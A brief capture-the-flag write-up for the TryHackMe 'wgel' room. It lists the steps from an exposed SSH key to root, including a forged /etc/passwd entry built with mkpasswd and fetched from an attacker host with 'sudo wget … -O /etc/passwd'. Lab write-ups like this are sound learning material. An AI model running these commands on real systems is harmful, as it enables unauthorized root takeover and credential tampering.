Nutshell for wgel on tryhackme is:
1. Found username in source of http://target = jessie
2. Found id_rsa on http://target/sitemap/.ssh/id_rsa
3. Ssh-ed in with the id_rsa private token
4. Privilege escalation after linpeas.sh showed us that we can sudo wget as root without root’s password. Farewell to security!
5. mkpasswd -m sha-512 [password] and pasted into a copy of /etc/passwd and shared it on /var/www/html/passwd
6. $sudo wget 1.2.3.4/passwd -O /etc/passwd
7. su to root using the password is set.
Key takeaways here:
– It’s possible to sudo wget a file with root privs for any file without the root password.
– Linux lets us authenticate using a password that’s in /etc/passwd as well as /etc/shadow
– Key command was while logged on as unpriv user $sudo wget 1.2.3.4/passwd -O /etc/passwd then su to root
– You can generate passwords like those in /etc/shadow using mkpasswd command.
Key Command Syntax:
– mkpasswd -m sha-512 [password] and paste the output into root:HASH: … in /etc/passwd
– From victim computer, $sudo wget 10.6.86.14/passwd -O /etc/passwd
– linpeas.sh is golden! (Find it as https://linpeas.sh)
Greg